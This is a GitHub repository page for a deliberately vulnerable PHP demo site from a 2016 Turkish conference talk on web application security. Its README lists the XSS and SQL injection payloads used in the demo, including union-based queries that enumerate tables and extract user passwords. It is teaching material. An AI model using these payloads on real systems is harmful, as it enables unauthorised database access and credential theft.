Akademik Bilişim 2016 kapsamındaki Web Uygulama Güvenliği sunumunda demo yaptığım sistem.
Switch branches/tags
Nothing to show
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
bootstrap
hack
inc
README.md
cikisyap.php
database.sql
footer.php
girisyap.php
header.php
index.php
uye.php
uyeler.php
uyeol.php

README.md

ab16WebUygulamaGuvenligi

Akademik Bilişim 2016 kapsamındaki Web Uygulama Güvenliği sunumunda demo yaptığım sistem.

Sunum : http://www.slideshare.net/Om3rCitak/web-uygulama-gvenlii-akademik-biliim-2016-57851287

Demoda Kullanılan Payloadlar

XSS

<script src='http://127.0.0.1/demo_xss_sql/hack/bad.js'></script>

Sql Injection

' or true #

' and 1=1

' and 1=2

' order by 3

-{id} union select 1,2,3

-{id} union select 1,database(),3

-{id} union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='bitcs'

-{id} union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='bitcs' and table_name='users'

-{id} union select 1,password,3 from users where id=1

-{id} union select 1,password,3 from users where username='omercitak'